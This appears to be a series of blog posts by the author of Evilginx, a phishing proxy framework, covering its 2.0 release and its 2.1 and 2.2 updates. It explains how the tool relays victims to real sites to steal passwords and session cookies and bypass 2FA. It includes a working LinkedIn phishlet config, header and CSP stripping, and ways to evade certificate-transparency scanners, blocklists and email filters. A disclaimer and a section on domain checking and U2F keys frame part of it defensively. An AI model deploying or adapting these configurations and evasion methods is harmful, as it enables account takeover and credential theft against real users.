Preparing for a final version of the phishlet file format, I did some restructuring of it. You will need to do some minor modifications to your custom phishlets, to make them compatible with Evilginx 2.2.0.

I've now also properly documented the new phishlet file format, so please get familiar with it here:
Phishlet File Format 2.2.0 Documentation

Removed name field from phishlets

Many of you reported proxy returning TLS errors when testing your own custom phishlets. They were caused by custom phishlets having the same name as another loaded phishlet.

That name field caused enough confusion, so I decided to remove it altogether. Phishlet name is now solely determined by the phishlet filename without the .yaml suffix. This should provide full uniqueness for each phishlet name as two same filenames can't exist in same directory, from which phishlets are loaded from.

Now when any of auth_urls is triggered, the redirection will take place AFTER response cookies for that request are captured

In previous versions, whenever any of auth_urls triggered the session capture, the redirection would happen immediately, before Evilginx could parse the response, received from the server.

This resulted in Evilginx not being able to parse and capture cookies returned in responses to that last request that would trigger the session capture and redirection.

This is now changed and you can safely pick the trigger URL path that still returns session cookies in the response, as they will be captured and saved, before the redirection happens.

Regular expression groups working with sub_filters

I've been asked about it recently and upon checking, I figured out that it has already been implemented since Evilginx release.

You can define a regular expression group, as you'd normally do, with parenthesis in search field and later refer to it in replace field with ${1}, where 1 is the group index and you can naturally use more than one group.

Example:

  - {triggers_on: 'www.linkedin.com', orig_sub: 'cdn', domain: 'linkedinapis.com', search: '//{hostname}/([0-9a-z]*)/nhome/', replace: '//{hostname}/${1}/nhome/', mimes: ['text/html', 'application/json']}

Refer to GO language documentation to see exactly how it works (make sure to see the example section):
https://golang.org/pkg/regexp/#Regexp.ReplaceAllString

Phishlets are now listed in a table

Simply said - phishlets listing was an ugly mess. Now it looks good.

Evilginx 2.2 - Jolly Winter Update

Phishlet fields are now selectively lowercased and validated upon loading to prevent surprises

Evilginx will now validate each phishlet on loading. It will try its best to inform you about any detected issues with an error message to make it easier to debug any accidental mistakes like typos or missing fields.

All search fields in the phishlet are now regular expressions by default

The phishlet documentation now specifies which fields are considered to be regular expressions, so do remember about proper escaping of regular expression strings.

As a quick example, if you used to look for login.username POST key to capture its value, you need to now define the field as key: 'login\.username', because . is one of the special characters used in regular expressions, which has a separate function.

Enjoy!

As always, I wanted to thank everyone for amazing feedback and providing ideas to improve Evilginx.

Keep the bug reports and feature requests incoming!

[Follow me on Twitter](https://twitter.com/mrgretzky)
[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

Evilginx 2.1 - The First Post-Release Update

10 September 2018 at 04:20
Evilginx 2.1 - The First Post-Release Update

About 2 months ago, I've released Evilginx 2. Since then, a lot of you reported issues or wished for specific features.

Your requests have been heard! I've finally managed to find some time during the weekend to address the most pressing matters.

[>> Download Evilginx 2 from GitHub <](https:>

Here is what has changed and how you can use the freshly baked features.

Changelog - version 2.1

Developer mode added

It is finally much easier to develop and test your phishlets locally. Start Evilginx with -developer command-line argument and it will switch itself into developer mode.
In this mode, instead of trying to obtain LetsEncrypt SSL/TLS certificates, it will automatically generate self-signed certificates.

Evilginx will generate a new root CA certificate when it runs for the first time. You can find the CA certificate at $HOME/.evilginx/ca.crt or %USERPROFILE%\.evilginx\ca.crt. Import this certificate into your certificate storage as a trusted root CA and your browsers will trust every certificate, generated by Evilginx.

Since this feature allows for local development, there is no need to register a domain at domain registrars. Just use any domain you want and set the server IP to 127.0.0.1 or your LAN IP:

config domain anydomainyouwant.com
config ip 127.0.0.1

It is important that your computer redirects all connections to phishing sites, to your local IP address. In order to do that, you need to modify the hosts file.

First, generate the hosts redirect rules with Evilginx, for the phishlet you want:

: phishlets hostname twitter twitter.anydomainyouwant.com
: phishlets get-hosts twitter

127.0.0.1 twitter.anydomainyouwant.com
127.0.0.1 abs.twitter.anydomainyouwant.com
127.0.0.1 api.twitter.anydomainyouwant.com

Copy the command output and paste it into your hosts file. The hosts file can be found at:
Linux: /etc/hosts
Windows: %WINDIR%\System32\drivers\etc\hosts

Remember to enable your phishlet and you can start using Evilginx locally (can be useful for demos too!).

Authentication cookie detection was completely rewritten

There were some limitations in the initial implementation of session cookie detection, so I rewrote a significant portion of its code. Now, Evilginx is able to detect and properly use httpOnly and hostOnly flags, as well as path values for each captured cookie.

IMPORTANT! Previously captured sessions will not load properly with latest version of Evilginx, so make sure you backup your captured sessions before updating.

Evilginx will now properly handle cookie domains .anydomain.com vs anydomain.com. This is very important as I've noticed, during testing, the imported cookies will not provide a working session if cookie domain is set improperly.

The difference between each is, that cookie set for domain .anydomain.com will be sent in requests to anydomain.com and also to any sub-domain of .anydomain.com (e.g. auth.anydomain.com), while the cookie set for domain anydomain.com will be sent only with requests to anydomain.com.

I had to also update current phishlets to properly detect cookie domain names (with . prefix or without), so you may also need to update your private ones, accordingly.

Regular expressions for cookie names and POST key names

It has come to my attention that some websites will dynamically generate cookie names or POST key names, based on user ID or some other factors. Since Evilginx was only able to look for fixed names, it would never be able to properly capture such cookies or intercept a username/password field in POST request.

Now, you can enter regular expressions for both cookie names and POST user_regex and pass_regex, by adding regexp to the string, after a comma , separator.

Here is the example. Let's say we want to capture a cookie that has the name session_user_738299, where 738299 is the user ID, which will be different for every user and thus will be a dynamic value. We can set up capturing of this cookie with regular expressions, like this (considering that the numerical value is always 6 digits):

auth_tokens:
  - domain: '.anydomain.com'
    keys: ['session_user_[0-9]{6},regexp']

This also can be done for POST keys. If we need to intercept a POST key, that will hold a username, with name user[session_id_36273], we can do:

user_regex:
  key: 'user\[session_id_.*\],regexp'
  re: '(.*)'

Same applies to pass_regex of course.

URL path detection for triggering session capture

You will find websites that set the session cookie ID before you even start typing your email in the login form. In such cases, Evilginx would detect the session cookie, capture it and since it was the last cookie it was meant to capture, it would consider the session captured. This would not be the case, since even no credentials were entered.

As smart people pointed out on Github, this can be remedied by detecting an HTTP request to specific URL path, which happens only after the user has successfully authenticated (e.g. /home).

Now you can add a new parameter in your phishlet auth_urls, where you provide an array of URL paths that will trigger the session capture. If we wanted to look for HTTP request to /home, we could do set it up like this:

auth_urls:
  - '/home'

With auth_urls set up in the phishlet, Evilginx will not trigger a session capture even when it considers all session cookies captured. These cookies will be stored only after the HTTP request to any of the specified URL paths happens.

IMPORTANT! URL paths in auth_urls are all considered regular expressions, so proper escaping may be required (also no need to add ,regexp to each string)

There is now a cool trick that utilizes both auth_urls feature and regular expressions for cookie names.

If you ever come across a website that sends cookies in such a way that makes them impossible to detect with regular expressions, you can just opt for capturing all the cookies for a given domain and waiting for the URL trigger.

This is how you'd do it:

auth_tokens:
  - domain: '.anydomain.com'
    keys: ['.*,regexp'] # captures all cookies for that domain
auth_urls:
  - '/home' # saves all captured cookies when this request is made

This is a very messy approach and I'd prefer to not see phishlets rely on that too much, but it can be done.

Empty subdomains now work

There was a bug that would prevent phishlets to work for websites that do not use any subdomains for some of their hostnames. This is no longer an issue and as an example to prove that it is fixed, I've slightly modified the twitter phishlet to work with twitter.com hostname.

Wrapping up

Keep posting issues you are having with creating your own phishlets as I'm sure there will still be scenarios that will require some adjustments made to Evilginx.

You can update by pulling latest changes to the master branch. I will post a binary release once I confirm that everything is stable.

[>> Follow me on Twitter <](https:>
[>> Download Evilginx 2 from GitHub <](https:>

I have some nice ideas still for upcoming releases like dynamic custom Javascript injection and forcing "Remember Me" check boxes by POST parameter injection.

Hope you are liking Evilginx so far.

Enjoy this update!

Evilginx 2 - Next Generation of Phishing 2FA Tokens

26 July 2018 at 06:01
Evilginx 2 - Next Generation of Phishing 2FA Tokens

It's been over a year since the first release of Evilginx and looking back, it has been an amazing year. I've received tons of feedback, got invited to WarCon by @antisnatchor (thanks man!) and met amazing people from the industry. A year ago, I wouldn't have even expected that one day Kevin Mitnick would showcase Evilginx in his live demos around the world and Techcrunch would write about it!

At WarCon I met the legendary @evilsocket (he is a really nice guy), who inspired me with his ideas to learn GO and rewrite Evilginx as a standalone application. It is amazing how GO seems to be ideal for offensive tools development and bettercap is its best proof!

This is where Evilginx is now. No more nginx, just pure evil. My main goal with this tool's release was to focus on minimizing the installation difficulty and maximizing the ease of use. Usability was not necessarily the strongest point of the initial release.

Updated instructions on usage and installation can always be found up-to-date on the tool's official GitHub project page. In this blog post I only want to explain some general concepts of how it works and its major features.

Update: Check also version 2.1 release post

TL;DR What am I looking at?

Evilginx is an attack framework for setting up phishing pages. Instead of serving templates of sign-in pages lookalikes, Evilginx becomes a relay between the real website and the phished user. Phished user interacts with the real website, while Evilginx captures all the data being transmitted between the two parties.

Evilginx, being the man-in-the-middle, captures not only usernames and passwords, but also captures authentication tokens sent as cookies. Captured authentication tokens allow the attacker to bypass any form of 2FA enabled on user's account (except for U2F - more about it further below).

Even if phished user has 2FA enabled, the attacker, outfitted with just a domain and a VPS server, is able to remotely take over his/her account. It doesn't matter if 2FA is using SMS codes, mobile authenticator app or recovery keys.

Take a look at the video demonstration, showing how attacker's can remotely hack an Outlook account with enabled 2FA.

Disclaimer: Evilginx project is released for educational purposes and should be used only in demonstrations or legitimate penetration testing assignments with written permission from to-be-phished parties. Goal is to show that 2FA is not a silver bullet against phishing attempts and people should be aware that their accounts can be compromised, nonetheless, if they are not careful.

[>> Download Evilginx 2 from GitHub <](https:>
**Remember - 2FA is not a silver bullet against phishing!**

2FA is very important, though. This is what head of Google Threat Intelligence had to say on the subject:

2FA is super important but please, please stop telling people that by itself it will protect people from being phished by the Russians or governments. If attacker can trick users for a password, they can trick them for a 6 digit code.

โ€” Shane Huntley (@ShaneHuntley) July 22, 2018

Old phishing tactics

Common phishing attacks, we see every day, are HTML templates, prepared as lookalikes of popular websites' sign-in pages, luring victims into disclosing their usernames and passwords. When the victim enters his/her username and password, the credentials are logged and attack is considered a success.

I love digging through certificate transparency logs. Today, I saw a fake Google Drive landing page freshly registered with Let's Encrypt. It had a hardcoded picture/email of presumably the target. These can be a wealth of info that I recommend folks checking out. pic.twitter.com/PRweQsgHKD

โ€” Justin Warner (@sixdub) July 22, 2018

This is where 2FA steps in. If phished user has 2FA enabled on their account, the attacker would require an additional form of authentication, to supplement the username and password they intercepted through phishing. That additional form of authentication may be SMS code coming to your mobile device, TOTP token, PIN number or answer to a question that only the account owner would know. Attacker not having access to any of these will never be able to successfully authenticate and login into victim's account.

Old phishing methods which focus solely on capturing usernames and passwords are completely defeated by 2FA.

Phishing 2.0

What if it was possible to lure the victim not only to disclose his/her username and password, but also to provide the answer to any 2FA challenge that may come after the credentials are verified? Intercepting a single 2FA answer would not do the attacker any good. Challenge will change with every login attempt, making this approach useless.

After each successful login, website generates an authentication token for the user's session. This token (or multiple tokens) is sent to the web browser as a cookie and is saved for future use. From that point, every request sent from the browser to the website will contain that session token, sent as a cookie. This is how websites recognize authenticated users after successful authentication. They do not ask users to log in, every time when page is reloaded.

This session token cookie is pure gold for the attacker. If you export cookies from your browser and import them into a different browser, on a different computer, in a different country, you will be authorized and get full access to the account, without being asked for usernames, passwords or 2FA tokens.

This is what it looks like, in Evilginx 2, when session token cookie is successfully captured:
Evilginx 2 - Next Generation of Phishing 2FA Tokens

Now that we know how valuable the session cookie is, how can the attacker intercept it remotely, without having physical access to the victim's computer?

Common phishing attacks rely on creating HTML templates which take time to make. Most work is spent on making them look good, being responsive on mobile devices or properly obfuscated to evade phishing detection scanners.

Evilginx 2 - Next Generation of Phishing 2FA Tokens

Evilginx takes the attack one step further and instead of serving its own HTML lookalike pages, it becomes a web proxy. Every packet, coming from victim's browser, is intercepted, modified and forwarded to the real website. The same happens with response packets, coming from the website; they are intercepted, modified and sent back to the victim. With Evilginx there is no need to create your own HTML templates. On the victim side everything looks as if he/she was communicating with the legitimate website. User has no idea idea that Evilginx sits as a man-in-the-middle, analyzing every packet and logging usernames, passwords and, of course, session cookies.

You may ask now, what about encrypted HTTPS connection using SSL/TLS that prevents eavesdropping on the communication data? Good question. Problem is that the victim is only talking, over HTTPS, to Evilginx server and not the true website itself. Evilginx initiates its own HTTPS connection with the victim (using its own SSL/TLS certificates), receives and decrypts the packets, only to act as a client itself and establish its own HTTPS connection with the destination website, where it sends the re-encrypted packets, as if it was the victim's browser itself. This is how the trust chain is broken and the victim still sees that green lock icon next to the address bar, in the browser, thinking that everyone is safe.

When the victim enters the credentials and is asked to provide a 2FA challenge answer, they are still talking to the real website, with Evilginx relaying the packets back and forth, sitting in the middle. Even while being phished, the victim will still receive the 2FA SMS code to his/her mobile phone, because he/she is talking to the real website (just through a relay).

Evilginx 2 - Next Generation of Phishing 2FA Tokens

After the 2FA challenge is completed by the victim and the website confirms its validity, website generates the session token, which it returns in form of a cookie. This cookie is intercepted by Evilginx and saved. Evilginx determines that authentication was a success and redirects the victim to any URL it was set up with (online document, video etc.).

At this point the attacker holds all the keys to the castle and is able to use the victim's account, fully bypassing 2FA protection, after importing the session token cookies into his web browser.

Be aware that: Every sign-in page, requiring the user to provide their password, with any form of 2FA implemented, can be phished using this technique!

How to protect yourself?

There is one major flaw in this phishing technique that anyone can and should exploit to protect themselves - the attacker must register their own domain.

By registering a domain, attacker will try to make it look as similar to real, legitimate domain as possible. For example if the attacker is targeting Facebook (real domain is facebook.com), they can, for example, register a domain faceboook.com or faceb00k.com, maximizing their chances that phished victims won't spot the difference in the browser's address bar.

That said - always check the legitimacy of website's base domain, visible in the address bar, if it asks you to provide any private information. By base domain I mean the one that precedes the top-level domain.

Evilginx 2 - Next Generation of Phishing 2FA Tokens

As an example, imagine this is the URL and the website, you arrived at, asks you to log into Facebook:

https://en-gb.facebook.cdn.global.faceboook.com/login.php

The top-level domain is .com and the base domain would be the preceeding word, with next . as a separator. Combined with TLD, that would be faceboook.com. When you verify that faceboook.com is not the real facebook.com, you will know that someone is trying to phish you.

As a side note - Green lock icon seen next to the URL, in the browser's address bar, does not mean that you are safe!

Green lock icon only means that the website you've arrived at, encrypts the transmission between you and the server, so that no-one can eavesdrop on your communication. Attackers can easily obtain SSL/TLS certificates for their phishing sites and give you a false sense of security with the ability to display the green lock icon as well.

Figuring out if the base domain you see is valid, sometimes may not be easy and leaves room for error. It became even harder with the support of Unicode characters in domain names. This made it possible for attackers to register domains with special characters (e.g. in Cyrillic) that would be lookalikes of their Latin counterparts. This technique recieved a name of a homograph attack.

As a quick example, an attacker could register a domain facebooฤธ.com, which would look pretty convincing even though it was a completely different domain name (ฤธ is not really k). It got even worse with other Cyrillic characters, allowing for ebะฐy.com vs ebay.com. The first one has an Cyrillic counterpart for a character, which looks exactly the same.

Major browsers were fast to address the problem and added special filters to prevent domain names from being displayed in Unicode, when suspicious characters were detected.

If you are interested in how it works, check out the IDN spoofing filter source code of the Chrome browser.

Now you see that verifying domains visually is not always the best solution, especially for big companies, where it often takes just one employee to get phished and allow attackers to steal vast amounts of data.

This is why FIDO Alliance introduced U2F (Universal 2nd Factor Authentication) to allow for unphishable 2nd factor authentication.

In short, you have a physical hardware key on which you just press a button when the website asks you to. Additionally it may ask you for account password or a complementary 4 digit PIN. The website talks directly with the hardware key plugged into your USB port, with the web browser as the channel provider for the communication.

Evilginx 2 - Next Generation of Phishing 2FA Tokens

What is different with this form of authentication, is that U2F protocol is designed to take the website's domain as one of the key components in negotiating the handshake. This means that if the domain in the browser's address bar, does not match the domain used in the data transmission between the website and the U2F device, the communication will simply fail. This solution leaves no room for error and is totally unphishable using Evilginx method.

Citing the vendor of U2F devices - Yubico (who co-developed U2F with Google):

With the YubiKey, user login is bound to the origin, meaning that only the real site can authenticate with the key. The authentication will fail on the fake site even if the user was fooled into thinking it was real. This greatly mitigates against the increasing volume and sophistication of phishing attacks and stops account takeovers.

It is important to note here that Markus Vervier (@marver) and Michele Orrรน (@antisnatchor) did demonstrate a technique on how an attacker can attack U2F devices using the newly implemented WebUSB feature in modern browsers (which allows websites to talk with USB connected devices). It is also important to mention that Yubico, the creator of popular U2F devices YubiKeys, tried to steal credit for their research, which they later apologized for.

You can find the list of all websites supporting U2F authentication here.

Coinciding with the release of Evilginx 2, WebAuthn is coming out in all major web browsers. It will introduce the new FIDO2 password-less authentication standard to every browser. Chrome, Firefox and Edge are about to receive full support for it.

To wrap up - if you often need to log into various services, make your life easier and get a U2F device! This will greatly improve your accounts' security.

Under the hood

Interception of HTTP packets is possible since Evilginx acts as an HTTP server talking to the victim's browser and, at the same time, acts as an HTTP client for the website where the data is being relayed to. To make it possible, the victim has to be contacting Evilginx server through a custom phishing URL that will point to Evilginx server. Simply forwarding packets from victim to destination website would not work well and that's why Evilginx has to do some on-the-fly modifications.

In order for the phishing experience to be seamless, the proxy overcomes the following obstacles:

1. Making sure that the victim is not redirected to phished website's true domain.

Since the phishing domain will differ from the legitimate domain, used by phished website, relayed scripts and HTML data have to be carefully modified to prevent unwanted redirection of victim's web browser. There will be HTML submit forms pointing to legitimate URLs, scripts making AJAX requests or JSON objects containing URLs.

Ideally the most reliable way to solve it would be to perform regular expression string substitution for any occurrence of https://legit-site.com and replacing it with https://our-phishing-site.com. Unfortunately this is not always the case and it requires some trial and error kung-fu, working with web inspector to track down all strings the proxy needs to replace to not break website's functionality. If target website uses multiple options for 2FA, each route has to be inspected and analyzed.

For example, there are JSON objects transporting escaped URLs like https:\/\/legit-site.com. You can see that this will definitely not trigger the regexp mentioned above. If you replaced all occurrences of legit-site.com you may break something by accident.

2. Responding to DNS requests for multiple subdomains.

Websites will often make requests to multiple subdomains under their official domain or even use a totally different domain. In order to proxy these transmissions, Evilginx has to map each of the custom subdomains to its own IP address.

Previous version of Evilginx required the user to set up their own DNS server (e.g. bind) and set up DNS zones to properly handle DNS A requests. This generated a lot of headache on the user part and was only easier if the hosting provider (like Digital Ocean) provided an easy-to-use admin panel for setting up DNS zones.

With Evilginx 2 this issue is gone. Evilginx now runs its own in-built DNS server, listening on port 53, which acts as a nameserver for your domain. All you need to do is set up the nameserver addresses for your domain (ns1.yourdomain.com and ns2.yourdomain.com) to point to your Evilginx server IP, in the admin panel of your domain hosting provider. Evilginx will handle the rest on its own.

3. Modification of various HTTP headers.

Evilginx modifies HTTP headers sent to and received from the destination website. In particular the Origin header, in AJAX requests, will always hold the URL of the requesting site in order to comply with CORS. Phishing sites will hold a phishing URL as an origin. When request is forwarded, the destination website will receive an invalid origin and will not respond to such request. Not replacing the phishing hostname with the legitimate one in the request would make it also easy for the website to notice suspicious behavior. Evilginx automatically changes Origin and Referer fields on-the-fly to their legitimate counterparts.

Same way, to avoid any conflicts with CORS from the other side, Evilginx makes sure to set the Access-Control-Allow-Origin header value to * (if it exists in the response) and removes any occurrences of Content-Security-Policy headers. This guarantees that no request will be restricted by the browser when AJAX requests are made.

Other header to modify is Location, which is set in HTTP 302 and 301 responses to redirect the browser to different location. Naturally the value will come with legitimate website URL and Evilginx makes sure this location is properly switched to corresponding phishing hostname.

4. Cookies filtering.

It is common for websites to manage cookies for various purposes. Each cookie is assigned to a specific domain. Web browser's task is to automatically send the stored cookie, with every request to the domain, the cookie was assigned to. Cookies are also sent as HTTP headers, but I decided to make a separate mention of them here, due to their importance. Example cookie sent from the website to client's web browser would look like this:

Set-Cookie: qwerty=219ffwef9w0f; Domain=legit-site.com; Path=/; Expires=Wed, 30 Aug 2019 00:00:00 GMT

As you can see the cookie will be set in client's web browser for legit-site.com domain. Since the phishing victim is only talking to the phishing website with domain our-phishing-site.com, such cookie will never be saved in the browser, because of the fact the cookie domain differs from the one the browser is communicating with. Evilginx will parse every occurrence of Set-Cookie in HTTP response headers and modify the domain, replacing it with the phishing one, as follows:

Set-Cookie: qwerty=219ffwef9w0f; Domain=our-phishing-site.com; Path=/;

Evilginx will also remove expiration date from cookies, if the expiration date does not indicate that the cookie should be deleted from browser's cache.

Evilginx also sends its own cookies to manage the victim's session. These cookies are filtered out from every HTTP request, to prevent them from being sent to the destination website.

5. SSL splitting.

As the whole world of world-wide-web migrates to serving pages over secure HTTPS connections, phishing pages can't be any worse. Whenever you pick a hostname for your phishing page (e.g. totally.not.fake.linkedin.our-phishing-domain.com), Evilginx will automatically obtain a valid SSL/TLS certificate from LetsEncrypt and provide responses to ACME challenges, using the in-built HTTP server.

This makes sure that victims will always see a green lock icon next to the URL address bar, when visiting the phishing page, comforting them that everything is secured using "military-grade" encryption!

6. Anti-phishing tricks

There are rare cases where websites would employ defenses against being proxied. One of such defenses I uncovered during testing is using javascript to check if window.location contains the legitimate domain. These detections may be easy or hard to spot and much harder to remove, if additional code obfuscation is involved.

Improvements

The greatest advantage of Evilginx 2 is that it is now a standalone console application. There is no need to compile and install custom version of nginx, which I admit was not a simple feat. I am sure that using nginx site configs to utilize proxy_pass feature for phishing purposes was not what HTTP server's developers had in mind, when developing the software.

Evilginx 2 - Next Generation of Phishing 2FA Tokens

Evilginx 1 was pretty much a combination of several dirty hacks, duct taped together. Nonetheless it somehow worked!

Additionally to fully responsive console UI, here are the greatest improvements:

Tokenized phishing URLs

In previous version of Evilginx, entering just the hostname of your phishing URL address in the browser, with root path (e.g. https://totally.not.fake.linkedin.our-phishing-domain.com/), would still proxy the connection to the legitimate website. This turned out to be an issue, as I found out during development of Evilginx 2. Apparently once you obtain SSL/TLS certificates for the domain/hostname of your choice, external scanners start scanning your domain. Scanners gonna scan.

The scanners use public certificate transparency logs to scan, in real-time, all domains which have obtained valid SSL/TLS certifcates. With public libraries like CertStream, you can easily create your own scanner.

Evilginx 2 - Next Generation of Phishing 2FA Tokens

For some phishing pages, it took usually one hour for the hostname to become banned and blacklisted by popular anti-spam filters like Spamhaus. After I had three hostnames blacklisted for one domain, the whole domain got blocked. Three strikes and you're out!

I began thinking how such detection can be evaded. Easiest solution was to reply with faked response to every request for path /, but that would not work if scanners probed for any other path.

Then I decided that each phishing URL, generated by Evilginx, should come with a unique token in the URL as a GET parameter.

For example, Evilginx responds with redirection response when scanner makes a request to URL:

https://totally.not.fake.linkedin.our-phishing-domain.com/auth/signin

But it responds with proxied phishing page, instead, when the URL is properly tokenized, with a valid token:

https://totally.not.fake.linkedin.our-phishing-domain.com/auth/signin?tk=secret_l33t_token

When tokenized URL is opened, Evilginx sets a validation cookie in victim's browser, whitelisting all subsequent requests, even for the non-tokenized ones.

This works very well, but there is still risk that scanners will eventually scan tokenized phishing URLs when these get out into the interwebz.

Hiding your phishlets

This thought provoked me to find a solution that allows manual control over when the phishing proxy should respond with proxied website and when it should not. As a result, you can hide and unhide the phishign page whenever you want. Hidden phishing page will respond with a redirection 302 HTTP code, redirecting the requester to predefined URL (Rick Astley's famous clip on Youtube is the default).

Temporarily hiding your phishlet may be useful when you want to use a URL shortener, to shorten your phishing URL (like goo.gl or bit.ly) or when you are sending the phishing URL via email and you don't want to trigger any email scanners, on the way.

Phishlets

Phishlets are new site configs. They are plain-text ruleset files, in YAML format, which are fed into the Evilginx engine. Phishlets define which subdomains are needed to properly proxy a specific website, what strings should be replaced in relayed packets and which cookies should be captured, to properly take over the victim's account. There is one phishlet for each phished website. You can deploy as many phishlets as you want, with each phishlet set up for a different website. Phishlets can be enabled and disabled as you please and at any point Evilginx can be running and managing any number of them.

I will do a better job than I did last time, when I released Evilginx 1, and I will try to explain the structure of a phishlet and give you brief insight into how phishlets are created (I promise to release a separate blog post about it later!).

I will dissect the LinkedIn phishlet for the purpose of this short guide:

name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
  - {
    phish_sub: 'www',
    orig_sub: 'www',
	domain: 'linkedin.com',
	session: true,
	is_landing: true
	}
sub_filters:
  - {
    hostname: 'www.linkedin.com',
	sub: 'www',
	domain: 'linkedin.com',
	search: 'action="https://{hostname}',
	replace: 'action="https://{hostname}',
	mimes: ['text/html', 'application/json']
	}
  - {
    hostname: 'www.linkedin.com',
	sub: 'www',
	domain: 'linkedin.com',
	search: 'href="https://{hostname}',
	replace: 'href="https://{hostname}',
	mimes: ['text/html', 'application/json']
	}
  - {
    hostname: 'www.linkedin.com',
	sub: 'www',
	domain: 'linkedin.com',
	search: '//{hostname}/nhome/',
	replace: '//{hostname}/nhome/',
	mimes: ['text/html', 'application/json']
	}
auth_tokens:
  - domain: 'www.linkedin.com'
    keys: ['li_at']
user_regex:
  key: 'session_key'
  re: '(.*)'
pass_regex:
  key: 'session_password'
  re: '(.*)'
landing_path:
  - '/uas/login'

First things first. I advise you to get familiar with YAML syntax to avoid any errors when editing or creating your own phishlets.

Starting off with simple and rather self-explanatory variables. name is the name of the phishlet, which would usually be the name of the phished website. author is where you can do some self promotion - this will be visible in Evilginx's UI when the phishlet is loaded. version is currently not supported, but will be very likely used when phishlet format changes in future releases of Evilginx, to provide some way of checking phishlet's compatibility with current tool's version.

Following that, we have proxy_hosts. This array holds an array of sub-domains that Evilginx will manage. This provides an array of all hostnames for which you want to intercept the transmission and gives you the capability to make on-the-fly packet modifications.

  • phish_sub : subdomain name that will be prefixed in the phishlet's hostname. I advise to leave it the same as the original subdomain name, due to issues that may arise later when doing string replacements properly, as it often requires additional work to support custom subdomain names.
  • orig_sub : the original subdomain name as used on the legitimate website.
  • domain : website's domain that we are targeting.
  • session : set this to true ONLY for subdomains that will return authentication cookies. This indicates which subdomain Evilginx should recognize as the one that will initiate the creation of Evilginx session and sets Evilginx session cookie for the domain name of this entry.
  • is_landing : set this to true if you want this subdomain to be used in generation of phishing URLs later.

In the LinkedIn example, we only have one subdomain that we need to support, which is www. The phishing hostname for this subdomain will then be: www.totally.not.fake.linkedin.our-phishing-domain.com.

Next are sub_filters, which tell Evilginx all about string substitution magics.

  • hostname : original hostname of the website, for which the substitution will take place.
  • sub : subdomain name from the original hostname. This is will be only used as a helper string in substitutions that I will explain below.
  • domain : domain name of the original hostname. Same as sub - used as a helper string in substitutions.
  • search : the regular expression of what to search for in HTTP packet's body. You can use some variables in {...} that Evilginx will prefill for you. I listed all supported variables below.
  • replace : the string that will act as a replacement for all occurrences of search regular expression matches. {...} variables are also supported here.
  • mimes : an array of MIME types that will only be considered before doing search and replace. Any of these defined MIME types must show up in Content-Type header of the HTTP response, before Evilginx considers to do any substitutions, for that packet. Most common MIME types to use here are: text/html, application/json, application/javascript or text/javascript.
  • redirect_only : use this sub_filter only if redirection URL is set in generated phishing URL (true or false).

The following is a list of bracket variables that you can use in search and replace parameters:

  • {hostname} : a combination of subdomain, defined by sub parameter, and a domain, defined by domain parameter. In search field it will be translated to the original website's hostname (e.g. www.linkedin.com). In the replace field, it will be translated to corresponding phishing hostname of matching proxy_hosts entry (e.g. www.totally.not.fake.linkedin.our-phishing-domain.com).
  • {subdomain} : same as {hostname} but only for the subdomain.
  • {domain} : same as {hostname} but only for the domain.
  • {domain_regexp} : same as {domain} but translates to properly escaped regular expression string. This can sometimes be useful when replacing anti-phishing protections in javascript, that try to verify if window.location contains the legitimate domain.
  • {hostname_regexp} : same as above, but for the hostname.
  • {subdomain_regexp} : same as above, but for the subdomain.

In the example we have:

  - {
    hostname: 'www.linkedin.com',
	sub: 'www',
	domain: 'linkedin.com',
	search: 'action="https://{hostname}',
	replace: 'action="https://{hostname}',
	mimes: ['text/html', 'application/json']
	}

This will make Evilginx search for packets with Content-Type of text/html or application/json and look for occurrences of action="https://www\.linkedin\.com (properly escaped regexp). If found, it will replace every occurrence with action="https://www.totally.not.fake.linkedin.our-phishing-domain.com.

As you can see this will replace the action URL of the login HTML form to have it point to Evilginx server, so that the victim does not stray off the phishing path.

That was the most complicated part. Now it should be pretty straight forward.

Next up are auth_tokens. This is where you define the cookies that should be captured on successful login, which combined together provide the full state of the website's captured session. The cookies defined here, when obtained, can later be imported to any browser (using this extension in Chrome) and allow to be immediately logged into the victim's account, bypassing any 2FA challenges.

  • domain : original domain for which the cookies will be saved for.
  • keys : array of cookie names that should be captured.

In the example, there is only one cookie that LinkedIn uses to verify the session's state. Only li_at cookie, saved for www.linkedin.com domain will be captured and stored.

Once Evilginx captures all of the defined cookies, it will display a message that authentication was successful and will store them in the database.

The two following parameters are similar user_regex and pass_regex. These define the POST request keys that should be searched for occurrences of usernames and passwords. Searching is defined by a regular expression that is ran against the contents of the POST request's key value.

  • key : name of the POST request key.
  • re : regular expression defining what data should be captured from the key's value (e.g. (.*) will capture the whole value)

Last parameter is landing_path array, which holds URL paths to login pages (usually one), of the phished website.

In our example, there is /uas/login which would translate to https://www.totally.not.fake.linkedin.our-phishing-domain.com/uas/login for the generated phishing URL.

Hope that sheds some light on how you can create your own phishlets and should help you understand the ones that are already shipped with Evilginx in the ./phishlets directory.

Future development

I'd like to continue working on Evilginx 2 and there are some things I have in mind that I want to eventually implement.

One of such things is serving an HTML page instead of 302 redirect for hidden phishlets. This could be a page imitating CloudFlare's "checking your browser" that would wait in a loop and redirect, to the phishing page, as soon as you unhide your phishlet.

Evilginx 2 - Next Generation of Phishing 2FA Tokens

Another thing to have at some point is to have Evilginx launch as a daemon, without the UI.

Update: You can find out about version 2.1 release here

Business Inquiries

If you are a red teaming company interested in development of custom phishing solutions, drop me a line and I will be happy to assist in any way I can.

If you are giving presentations on flaws of 2FA and/or promoting the use of FIDO U2F/FIDO2 devices, I'd love to hear how Evilginx can help you raise awareness.

In any case, send me an email at: [email protected]

I'll respond as soon as I can!

Credits

Since the release of Evilginx 1, in April last year, a lot has changed in my life for the better. I met a lot of wonderful, talented people, in front of whom I could exercise my impostor syndrome!

I'd like to thank few people without whom this release would not have been possible:

@evilsocket - for letting me know that Evilginx is awesome, inspiring me to learn GO and for developing so many incredible products that I could steal borrow code from!

@antisnatchor and @h0wlu - for organizing WarCon and for inviting me!

@juliocesarfort and @Mario_Vilas - for organizing AlligatorCon and for being great reptiles!

@x33fcon - for organizing x33fcon and letting me do all these lightning talks!

Vincent Yiu (@vysecurity) - for all the red tips and invitations to secret security gatherings!

Kevin Mitnick (@kevinmitnick) - for giving Evilginx a try and making me realize its importance!

@i_bo0om - for giving me an idea to play with nginx's proxy_pass feature in his post.

Cristofaro Mune (@pulsoid) & Denis Laskov (@it4sec) - for spending their precious time to hear out my concerns about releasing such tool to the public.

Giuseppe "Ohpe" Trotta (@Giutro) - for a heads up that there may be other similar tools lurking around in the darkness ;)

